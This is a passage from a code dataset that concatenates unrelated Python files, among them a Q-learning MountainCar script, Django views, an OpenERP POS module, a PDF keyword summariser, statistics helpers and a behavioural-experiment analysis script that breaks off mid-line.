Words.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"122304325","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mountain_car_q_learning\nfrom mountain_car_q_learning import plot_cost_to_go, StateTransformer, RBFLearnModel, plot_running_avg\n\n\n# the main difference with a basic Q-learning that we calculate G for a multiple steps\nclass SGDRegressor:\n def __init__(self, **kwargs):\n self.weights = None\n self.learning_rate = 0.01\n\n # keep in mind that Y is G\n def partial_fit(self, X, Y):\n if self.weights is None:\n dimensions = X.shape[1]\n self.weights = np.random.randn(dimensions) / np.sqrt(dimensions)\n self.weights += self.learning_rate * (Y - X.dot(self.weights)).dot(X)\n\n def predict(self, X):\n return X.dot(self.weights)\n\nmountain_car_q_learning.SGDRegressor = SGDRegressor\n\n# we have to keep N states, rewards and actions\ndef play_one(env, model, eps, gamma, n=5):\n state = env.reset()\n done = False\n total_reward = 0\n rewards = []\n states = []\n actions = []\n # for each step we have to multiply by additional gamma\n n_gammas = np.array([gamma]*n) ** np.arange(n)\n\n while not done:\n action = model.next_action(state, eps)\n\n states.append(state)\n actions.append(action)\n\n prev_state = state\n state, reward, done, info = env.step(action)\n\n rewards.append(reward)\n\n # update model\n if len(rewards) >= n:\n previous_returns = n_gammas.dot(rewards[-n:])\n G = previous_returns + (gamma **n)*np.max(model.predict(state)[0])\n model.update(states[-n], actions[-n], G)\n\n total_reward += reward\n\n rewards = rewards[-n+1:]\n states = states[-n+1:]\n actions = actions[-n+1:]\n\n # according to documentation goal achived if position > 0.5\n win = state[0] >= 0.5\n if win:\n while len(rewards) > 0:\n G = n_gammas[:len(rewards)].dot(rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n else:\n # we lose, so it is a good idea to set negative reward\n while len(rewards) > 0:\n guess_rewards = rewards + [-1]*(n - len(rewards))\n G = n_gammas.dot(guess_rewards)\n model.update(states[0], actions[0], G)\n states.pop(0)\n actions.pop(0)\n rewards.pop(0)\n return total_reward\n\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n state_transformer = StateTransformer(env)\n model = RBFLearnModel(env, state_transformer, \"constant\")\n gamma = 0.99\n\n N_episodes = 300\n total_rewards = np.empty(N_episodes)\n for episode in range(N_episodes):\n eps = 0.1 * (0.97 ** episode)\n one_episode_reward = play_one(env, model, eps, gamma)\n total_rewards[episode] = one_episode_reward\n if (episode + 1) % 100 == 0:\n print(\"episode:\", episode, \"total reward:\", total_rewards)\n\n plt.plot(total_rewards)\n plt.title(\"Rewards\")\n plt.show()\n\n plot_running_avg(total_rewards)\n plot_cost_to_go(env, model)\n\n\n\n","sub_path":"olena_reinforsment_learning/n_step.py","file_name":"n_step.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"404363","text":"\"\"\"\n\"\"\"\n\nfrom gluegov.lib.tables import XLSTable\nimport xlrd\n\ndef format(x):\n try:\n return str(int(x))\n except:\n return str(x)\n\ndef isNotEmpty(x):\n return x != \"\" and x != \" \"\n\nclass onsXLSTable(XLSTable):\n def parse(self):\n # open file and get the correct sheet\n b = xlrd.open_workbook(self.fileName)\n s = b.sheet_by_index(1)\n\n # get keys\n keylist1 = s.row_values(9)\n keylist2 = s.row_values(10)\n\n # map keylists to one keylist\n keylist = [e for e in map(lambda x, y: x+\" \"+format(y), keylist1, keylist2)]\n keylist = [e for e in filter(lambda x: isNotEmpty(x), keylist)]\n self.fields = keylist\n\n for x in range(13, 463):\n row = s.row_values(x)\n row = [e for e in filter(lambda x: isNotEmpty(x), row)]\n if row != []:\n rowDict = dict(zip(keylist, row))\n self.records.append(rowDict)\n\n\nonsXLSTable(\n \"ons\",\n \"population-and-household-estimates\",\n \"http://www.ons.gov.uk/ons/rel/census/2011-census/population-and-household-estimates-for-england-and-wales---unrounded-figures-for-the-data-published-16-july-2012/rft-1-2-ew-pp04.xls\",\n \"population-and-household-estimates.xls\"\n).parse()\n","sub_path":"server/gluegov/data/ons.py","file_name":"ons.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293922700","text":"def countdown(number):\n if number >= 0:\n print(number)\n countdown(number - 1)\n\ndef countup(curr, max):\n if curr <= max:\n print(curr)\n countup(curr + 1, max)\n\ndef sil(n):\n if n == 1:\n return 1\n else:\n return n * sil(n - 1)\n\n\n#countdown(10)\n#countup(1, 2)\nnumb = 3\nprint(f\"{numb}! = {sil(numb)}\")","sub_path":"Rekurencja.py","file_name":"Rekurencja.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"533057326","text":"import re\nimport sys\nfrom os import path\nfrom setuptools import find_packages, setup\nfrom setuptools.command.test import test as TestCommand\n\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'PACKAGE_README.md')) as f:\n long_description = f.read()\n\n\nclass PyTest(TestCommand):\n user_options = [('pytest-args=', 'a', \"Arguments to pass to pytest\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def run_tests(self):\n import shlex\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(shlex.split(self.pytest_args))\n sys.exit(errno)\n\n\ntests_require = [\n 'pandas',\n 'pytest',\n 'requests_mock',\n 'mock', # needed for Python 2\n 'future', # needed for Python 2\n 'pylint',\n 'pylint2junit'\n]\n\nrelease_require = [\n 'zest.releaser[recommended]>=6.13.5,<6.14',\n 'readme-renderer>=24.0,<25.0',\n 'setuptools >= 38.6.0',\n 'wheel >= 0.31.0',\n 'twine >= 1.11.0',\n]\n\ndev_require = tests_require + [\n 'ipython',\n 'sphinx==1.8.3',\n 'sphinx_rtd_theme==0.1.9',\n 'nbsphinx>=0.2.9,<1',\n 'nbconvert>=5.3,<6',\n 'numpydoc>=0.8.0',\n]\n\n\nwith open('datarobotai/_version.py') as fd:\n version = re.search(r'^__version__\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]',\n fd.read(), re.MULTILINE).group(1)\n\nif not version:\n raise RuntimeError('Cannot find version information')\n\n\nsetup(name='datarobot-ai',\n version=version,\n description='Python Client for the DataRobot AI API',\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n url='https://github.com/datarobot/datarobot-ai-py',\n author='DataRobot, Inc',\n author_email='support@datarobot.com',\n license='Apache 2.0',\n packages=find_packages(),\n install_requires=[\n 'requests', 'requests_toolbelt', 'six', 'backports.csv'\n ],\n tests_require=tests_require,\n extras_require={\n 'dev': dev_require,\n 'release': release_require,\n 'recommended': ['pandas==0.24.2'],\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n cmdclass={'test': PyTest},\n include_package_data=True,\n zip_safe=False)\n","sub_path":"pypi_install_script/datarobot-ai-1.0.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370861894","text":"# header\nheader = {'Content-Type\t':'application/x-www-form-urlencoded'}\n# 文字识别api地址\ngeneral_url = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic'\n# 语种字典\nlanguage_dict = {'中英混合':'CHN_ENG',\n '英文':'ENG',\n '葡萄牙语':'POR',\n '法语':'FRE',\n '德语':'GER',\n '意大利语':'ITA',\n '西班牙语':'SPA',\n '俄语':'RUS',\n '日语':'JAP',\n '韩语':'KOR'\n }\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61264607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView # Import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom django.shortcuts import get_object_or_404\nfrom main.models import Employees\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.views import generic\n# Create your views here.\n#def home(request):\n# return HttpResponse(\"Hello World!\")\n\n#def home(request):\n# return render(request, \"main/home.html\", {'message': 'hi, sumit'})\n\ndef homepage(request):\n# employees=User.objects.all()\n employees = Employees.objects.all()\n# emp = employees.filter(user_id=\"sumitka\")\n return render(request, 'home.html', context={'employees':employees},\n )\n\nclass UserList(ListView):\n model = Employees\n template_name = 'home.html'\n# def get_context_data(self, **kwargs):\n# # Call the base implementation first to get a context\n# context = super(UserList, self).get_context_data(**kwargs)\n# # Get the blog from id and add it to the context\n# context['some_data'] = 'This is just some data'\n# return context\n\ndef index(request):\n homepage = Employees.objects.all()\n return render(request, 'index.html', {'homepage': homepage})\n\n# Add the two views we have been talking about all this time :)\n#class HomePageView(TemplateView):\n# template_name = \"home.html\"\n\n\n\nclass UserCreateView(generic.CreateView):\n from_class = UserCreationForm\n model = User\n template_name = 'createuser.html'\n# def __init__(self, arg):\n# super(UserCreateView, self).__init__()\n# self.arg = arg\n\n\nclass AboutPageView(TemplateView):\n template_name = \"about.html\"\n\n# Add this view\nclass DataPageView(TemplateView):\n def get(self, request, **kwargs):\n # we will pass this context object into the\n # template so that we can access the data\n # list in the template\n context = {\n 'data': [\n {\n 'name': 'Celeb 1',\n 'worth': '3567892'\n },\n {\n 'name': 'Celeb 2',\n 'worth': '23000000'\n },\n {\n 'name': 'Celeb 3',\n 'worth': '1000007'\n },\n {\n 'name': 'Celeb 4',\n 'worth': '456789'\n },\n {\n 'name': 'Celeb 5',\n 'worth': '7890000'\n },\n {\n 'name': 'Celeb 6',\n 'worth': '12000456'\n },\n {\n 'name': 'Celeb 7',\n 'worth': '896000'\n },\n {\n 'name': 'Celeb 8',\n 'worth': '670000'\n }\n ]\n }\n\n return render(request, 'data.html', context)\n","sub_path":"old_skillset/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"365082858","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nimport time\n\n#n 5 x 5 board size\n#k 3 num of obstacles\n#r_q 4 row of queen\n#c_q 3 col of queen\n#obstacles array of obs r,c\n# 5 3 4 3 [[5, 5], [4, 2], [2, 3]]\n\n\n# 3,3 [4,3],[4,4],[3,4],[2,4],[2,3],[2,2],[3,2],[4,2]\n\n\n\n# Complete the queensAttack function below.\ndef queensAttack(n, k, r_q, c_q, obstacles):\n r = r_q\n c = c_q\n m = r_q - c_q\n mp = r_q + c_q\n move_count = 0\n obs = []\n #get nearest obstacles\n for x in range(k):\n if obstacles[x][0] == r_q or obstacles[x][1] == c_q or obstacles[x][0] - obstacles[x][1] == m or obstacles[x][0] + obstacles[x][1] == mp:\n obs.append(obstacles[x])\n print(obs)\n\n\n # print(obstacles[x][0])\n # if obstacles[x]\n\n # all_moves = []\n # for x in range(n):\n # coords_to_add = [[r+1+x,c],[r-1-x,c],[r+1+x,c+1+x],[r+x,c-1+x],[r+x,c+1+x],[r-1+x,c-1+x],[r-1+x,c],[r-1,c+1]]\n # print(coords_to_add)\n \n\n \n\n\n\n\nstart_time = time.time()\nqueensAttack(8,7,3,5,[[3,1], [3,7], [6,5], [5,3], [5,7], [2,4], [1,7]])\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"hr_queen_attack_3.py","file_name":"hr_queen_attack_3.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513578090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 08 22:56:35 2018\r\n\r\n@author: matth\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport textract\r\n#from difflib import get_close_matches, SequenceMatcher\r\n#from collections import Counter\r\n#import re\r\nfrom wordcloud import WordCloud\r\nimport matplotlib.pyplot as plt\r\nimport gensim.summarization.summarizer as summ\r\nimport json\r\n\r\n#def count_close_matches(word,list_text,cutoff):\r\n# out = get_close_matches(word,list_text,1000,cutoff)\r\n# return len(out)\r\n\r\nfiles = os.listdir(\"../\")\r\n\r\nn_files = np.size(files)\r\nn = 337\r\nwhile n < n_files:\r\n \"\"\"n_files:\"\"\"\r\n \"\"\"if file[n][-3:-1]\"\"\"\r\n if files[n][-4:] == \".pdf\":\r\n print(\"\\nReadingFile: \"+files[n]+\" (\"+str(n+1)+\" of \"+str(n_files)+\")\")\r\n text = textract.process(\"../\"+files[n],\\\r\n method='tesseract',\\\r\n language='eng',\\\r\n )\r\n d_text = text.decode(\"UTF-8\",\"replace\")\r\n# l_text_1 = re.findall(r\"[\\w']+\",d_text)\r\n# l_text_2 = d_text.replace(\"\\n\",\" \")\r\n# l_text_2.replace(\".\",\" \")\r\n# l_text_2.replace(\"?\",\" \")\r\n# l_text_2 = d_text.split(\" \")\r\n# ll_text_1 = [text.lower() for text in l_text_1]\r\n# ll_text_2 = [text.lower() for text in l_text_2]\r\n \r\n wordcloud_1 = WordCloud(collocations=False,regexp=r\"\\w[\\w'-]+|[0-9]+\\s[\\w]+\").generate(d_text)\r\n file = open(\"./\"+files[n][0:-4]+\"_keywords.txt\",'w')\r\n file.write(json.dumps(wordcloud_1.words_).replace(\" \",\"\\n\"))\r\n file.close()\r\n \r\n# wordcloud_2 = WordCloud.generate(ll_text_2)\r\n \r\n fig1 = plt.figure()\r\n plt.imshow(wordcloud_1,interpolation='bilinear')\r\n plt.axis(\"off\")\r\n plt.show()\r\n fig1.savefig(\"./\"+files[n][0:-4])\r\n \r\n \r\n ss = summ.summarize(d_text,ratio=0.2)\r\n file = open(\"./\"+files[n][0 :-3]+\"txt\",'w')\r\n file.write(ss)\r\n file.close()\r\n# plt.figure()\r\n# plt.imshow(wordcloud_2,interpolation='bilinear')\r\n# plt.axis(\"off\")\r\n# plt.show()\r\n# print(type(d_text))\r\n# keywords = [\"nanomaterials\",\"biomedical\",\"spectrum\",\"x-ray\",\"gamma\",\\\r\n# \"radiation\",\"semiconductor\",\"quantum\",\"reconstruction\",\\\r\n# \"geometry\",\"spectral\",\"optogenetics\",\"erg\",\"ecog\",\"photon\",\\\r\n# \"patch-clamp\",\"electrophysiology\",\"electroretinography\",\\\r\n# \"imaging\",\"therapy\",\"diagnostic\",\"theranostic\",\"protein\",\\\r\n# \"delivery\",\"nanoparticle\",\"upconversion\",\"fluorescence\",\\\r\n# \"light\",\"visible\",\"k-edge\",\"absorption\",\"antioxidant\",\\\r\n# \"oxidative\",\"stress\",\"g-protein\",\"gpcr\",\"opsin\",\\\r\n# \"rhodopsin\",\"genetics\",\"energy\",\"scatter\",\"pulse\",\"dose\",\\\r\n# \"rf\",\"infrared\",\"nir\",\"electronics\",\"pulse-train\",\\\r\n# \"waveform\",\"electricity\",\"electron\",\"neural\",\"network\",\\\r\n# \"lightning\",\"radon\",\"particle\",\"wave\",\"microscopy\",\"field\",\\\r\n# \"mutation\",\"single-strand\",\"double-strand\",\"free\",\"radical\",\\\r\n# \"magnetic\",\"mri\",\"dti\",\"fmri\",\"detector\",\"ccd\",\"emccd\",\\\r\n# \"pmt\",\"uv\",\"ultraviolet\",\"dna\",\"eye\",\"retina\",\"genomics\",\\\r\n# \"proteomics\",\"scatter\",\"water\",\"fungi\",\"tissue\",\"single-cell\",\\\r\n# \"cell\",\"review\",\"abstract\",\"methods\",\"results\",\"conclusions\",\\\r\n# \"discussion\",\"cancer\",\"statistics\",\"machine-learning\",\\\r\n# \"aperture\",\"grating\",\"interferometry\",\"response\",\"a-wave\",\\\r\n# \"b-wave\",\"frequency\",\"damage\"]\r\n# l_m = 0\r\n# for word in keywords:\r\n# if len(word) > l_m:\r\n# l_m = len(word)\r\n# \r\n# \r\n# offset = l_m + 4\r\n# \r\n# for word in keywords:\r\n# num = count_close_matches(word,ll_text_2,0.85)\r\n# print(\"Instances of \"+word+\":\"+\" \"*(offset-len(word))+str(num))\r\n# \r\n# counts = Counter(l_text_l)\r\n# print(counts)\r\n \r\n n += 1\r\n \r\n","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"328921843","text":"# jacob clarkson\n# project euler problem 10\n# january 2015\n\n# program to find the sum of all the prime numbers below 2 million\n\nimport math\n\n# method to check if a number is a prime number (reasonably efficient trial division method)\ndef isPrime(x):\n\tfor i in range (3, int(math.sqrt(x) + 1)):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\nsum = 2\nfor x in range (2, 2000000):\n\tif x%2 != 0:\n\t\tif isPrime(x) == True:\n\t\t\tsum += x\n\nprint (sum)","sub_path":"Prob10.py","file_name":"Prob10.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"639344885","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# Copyright (c) 2013 BroadTech IT Solutions.\n# (http://wwww.broadtech-innovations.com)\n# contact@boradtech-innovations.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp import models, fields\n\nfrom psycopg2.extensions import ISOLATION_LEVEL_READ_COMMITTED\nimport time\n\nclass pos_order(models.Model):\n _inherit = 'pos.order'\n \n return_order = fields.Boolean('Returned', readonly=True, help='To identify the order is returned or not!')\n \n def create(self, cr, user, vals, context=None):\n for val in vals.get('lines'):\n for key in val:\n if isinstance(key, dict):\n order_id = key.get('order_id')\n if order_id:\n refund_reference = self.browse(cr, user, order_id, context).pos_reference\n if refund_reference:\n vals.update({'pos_reference': 'Refund'+' '+refund_reference,\n 'return_order': True})\n cr._cnx.set_isolation_level(ISOLATION_LEVEL_READ_COMMITTED)\n return super(pos_order, self).create(cr, user, vals, context)\n \n def _order_fields(self, cr, uid, ui_order, context=None):\n fields = {\n 'name': ui_order['name'],\n 'user_id': ui_order['user_id'] or False,\n 'session_id': ui_order['pos_session_id'],\n 'lines': ui_order['lines'],\n 'pos_reference':ui_order['name'],\n 'partner_id': ui_order['partner_id'] or False,\n }\n if ui_order['return_status'] == 'active':\n fields.update({'return_order': ui_order['return_order']})\n return fields\n \n def create_from_ui(self, cr, uid, orders, context=None):\n # Keep only new orders\n submitted_references = [o['data']['name'] for o in orders]\n existing_order_ids = self.search(cr, uid, [('pos_reference', 'in', submitted_references)], context=context)\n existing_orders = self.read(cr, uid, existing_order_ids, ['pos_reference'], context=context)\n existing_references = set([o['pos_reference'] for o in existing_orders])\n orders_to_save = [o for o in orders if o['data']['name'] not in existing_references]\n\n order_ids = []\n\n for tmp_order in orders_to_save:\n to_invoice = tmp_order['to_invoice']\n order = tmp_order['data']\n if order['return_status'] == 'active':\n order.update({'return_order': True})\n order_id = self._process_order(cr, uid, order, context=context)\n order_ids.append(order_id)\n\n try:\n self.signal_workflow(cr, uid, [order_id], 'paid')\n except Exception as e:\n _logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n if to_invoice:\n self.action_invoice(cr, uid, [order_id], context)\n order_obj = self.browse(cr, uid, order_id, context)\n self.pool['account.invoice'].signal_workflow(cr, uid, [order_obj.invoice_id.id], 'invoice_open')\n\n return order_ids\n \npos_order()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"humanytek_pos/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353198543","text":"#!/usr/bin/python\n# coding: latin-1\nimport numpy as np\nimport scipy.stats.distributions as distributions\n\n\"\"\"\n CONTINGENCY TABLE ANALYSIS (CTA)\n\n Test of the association between em2D and RMSD using CTA (Num. Rec. 2007, sec. 14.4)\n\"\"\"\n\n\ndef cta_chi_square(X,Y,bins):\n \"\"\"\n Contingency Table Analysis\n Measure of the association of variables X and Y with the chi-square\n statistic. Num. Rec. 14.4.1\n bins - the number of bins to form for the association test\n output - The p-value of the chi-square test\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n X2 = 0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n # print \"i,j\",i,j\n if(Nx[i] == 0 or Ny[j] == 0):\n continue # ignore empty bins\n nij = 1.0* Nx[i] * Ny[j] / N\n X2 += 1.0 * ( (CT[i][j] - nij)**2 ) / nij\n deg = bins*bins-bins-bins+1 # Degrees of freedom\n chi2 = distributions.chi2\n Q = 1-chi2.cdf(X2, deg)\n return Q\n\n\ndef mutual_information(X, Y, bins):\n \"\"\"\n Mutual information between X and Y sets of values. The values are\n tabulated in a table of bins x bins size.\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n # Mutual information\n I = 0\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n I += pij * np.log(pij/ (Px[i] * Py[j]) )\n return I\n \ndef uncertainty_coefficient(X, Y, bins):\n \"\"\"\n Uncertainty coefficient of Y respect to X\n 0 - no relationship\n 1 - perfect relationship\n \"\"\"\n epsilon = 1e-5\n if(len(X) != len(Y)):\n raise ValueError(\"X and Y must have the same number of elements\")\n # Bin the variables:\n # Contingency table (histogram2d)\n CT, xedges, yedges = np.histogram2d(X, Y, bins=bins)\n# print CT\n Nx = np.sum(CT, axis = 1)\n Ny = np.sum(CT, axis = 0)\n N = np.sum(CT)\n \n I = mutual_information(X, Y, bins)\n # entropy of Y given X\n Px = Nx/(N*1.0)\n Py = Ny/(N*1.0)\n Hyx =0.0\n for i in np.arange(0,bins): # X\n for j in np.arange(0,bins): # Y\n pij = 1.0 * CT[i][j]/N\n if(pij < epsilon): continue\n Hyx += pij * np.log(pij/Px[i] )\n Hyx = -1 * Hyx \n # entropy of Y \n Hy = (-1.) * np.sum([p*np.log(p) for p in Py if p> epsilon]) \n return (Hy-Hyx)/Hy\n \n","sub_path":"math/mutual_information.py","file_name":"mutual_information.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18071867","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.db import models\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom django.contrib.contenttypes import generic\r\nfrom django.contrib.contenttypes.models import ContentType\r\n\r\nclass Seo(models.Model):\r\n class Meta:\r\n verbose_name = _('SEO fields')\r\n verbose_name_plural = _('SEO fields')\r\n unique_together = ((\"content_type\", \"object_id\"),)\r\n\r\n title = models.CharField(verbose_name=_('Title'),\r\n max_length=200, default='', blank=True)\r\n description = models.CharField(verbose_name=_('Description'),\r\n max_length=200, default='', blank=True)\r\n keywords = models.CharField(verbose_name=_('Keywords'),\r\n max_length=1000, default='', blank=True)\r\n\r\n content_type = models.ForeignKey(ContentType)\r\n object_id = models.PositiveIntegerField()\r\n content_object = generic.GenericForeignKey('content_type', 'object_id')\r\n\r\n def __unicode__(self):\r\n return self.title\r\n\r\nclass Url(models.Model):\r\n class Meta:\r\n verbose_name = _('URL')\r\n verbose_name_plural = _('URLs')\r\n\r\n url = models.CharField(verbose_name=_('URL'),\r\n max_length=200, default='/', unique=True,\r\n help_text=_(\"This should be an absolute path, excluding the domain name. Example: '/events/search/'.\"))\r\n\r\n def get_absolute_url(self):\r\n return self.url\r\n\r\n def __unicode__(self):\r\n return self.url\r\n","sub_path":"virtual/lib/python3.6/site-packages/seo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"532424213","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import pylab\nimport pandas as pd\nimport seaborn as sns\nimport warnings\nimport pickle\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport scipy\n\n\n# Suppress runtimewarning due to pandas bug\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n# *********************************************\n# Set up defaults\n# *********************************************\nplot = False\nsave = False\nprint_diagnoistic = True\n\n# *********************************************\n# Load Data\n# ********************************************\ndata_dir = os.path.expanduser('~')\nbias2_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias2_parameter_fits.pkl', 'rb'))\nbias1_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/bias1_parameter_fits.pkl', 'rb'))\neoptimal_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/eoptimal_parameter_fits.pkl', 'rb'))\nignore_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/ignore_parameter_fits.pkl', 'rb'))\nmidline_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/midline_parameter_fits.pkl', 'rb'))\nswitch_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/switch_parameter_fits.pkl', 'rb'))\nmemory_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/memory_parameter_fits.pkl', 'rb'))\nperseverance_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/perseverance_parameter_fits.pkl', 'rb'))\npermem_fit_dict = pickle.load(open('../../Analysis/Analysis_Output/permem_parameter_fits.pkl', 'rb'))\n\ngtrain_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_df.pkl')\ngtrain_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtrain_learn_df.pkl')\ngtest_learn_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_learn_df.pkl')\ngtest_conform_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_conform_df.pkl')\ngtest_df = pd.read_pickle('../../Analysis/Analysis_Output/gtest_df.pkl')\ngtrain_learn_df.id = gtrain_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\ngtest_learn_df.id = gtest_learn_df.id.astype('str').apply(lambda x: x.zfill(3))\n\n\n# *********************************************\n# Select Dataset\n# ********************************************* \nmodel = 'TS'\ndf = gtest_df.copy()\nif 'midline_posterior' in df.columns:\n df.drop(['midline_posterior','midline_posterior_cross'], axis = 1, inplace = True)\n\n# *********************************************\n# Additional Variables\n# ********************************************* \nfor models in ['bias2','bias1','eoptimal', 'ignore', 'switch','memory','perseverance','permem']:\n df[models + '_choice'] = (df[models + '_posterior']>.5).astype(int)\n df[models + '_certainty'] = (abs(df[models + '_posterior']-.5))/.5\n\nswitch_sums = []\ntrials_since_switch = 0\nfor i,row in df.iterrows():\n if row['switch'] == 1 or pd.isnull(row['switch']):\n trials_since_switch = 0\n else:\n trials_since_switch += 1\n switch_sums.append(trials_since_switch)\ndf['trials_since_switch'] = switch_sums\n\n\n# *********************************************\n# Selection Criterion\n# ********************************************* \n## Exclude subjects based on behavioral criteria\nselect_ids = gtest_df.groupby('id').mean().stim_conform>.75\nselect_ids = list(select_ids[select_ids].index)\nutter_failures = df.query('id not in %s' % select_ids)\ndf = df.query('id in %s' % select_ids)\n\n\n\ngroup_means = df.groupby('id')['correct'].mean() \nk = range(1,10)\nk_error = []\nfor k_i in k: \n c,label = scipy.cluster.vq.kmeans2(group_means,k_i)\n k_error.append(np.sum(np.power([c[i] for i in label]-group_means,2)))\n\n#exclude subjects based on percent correct\nx = df.groupby('id')['correct'].mean() \nc,label = scipy.cluster.vq.kmeans2(group_means,np.array([.49,.51]))\n\n\n\n# *********************************************\n# Model Comparison\n# ********************************************* \ncompare_df = df\ncompare_df_subset = compare_df.filter(regex = 'subj_ts|.*posterior_cross$')\nmodel_subj_compare = compare_df_subset.corr()\n\nlog_posteriors = pd.DataFrame()\nfor model in compare_df_subset.columns[1:]:\n log_posteriors[model] = np.log(abs(compare_df_subset.subj_ts-(1-compare_df_subset[model])))\n\n\ncompare_df = pd.concat([compare_df[['id','subj_ts','context']], log_posteriors], axis = 1)\ncompare_df['random_log'] = np.log(.5)\n\nsummary = compare_df.groupby('id').sum().drop(['context','subj_ts'],axis = 1)\n\nnum_params = [3,2,1,1,3,3,4,1,0]\nparam_cost_df = 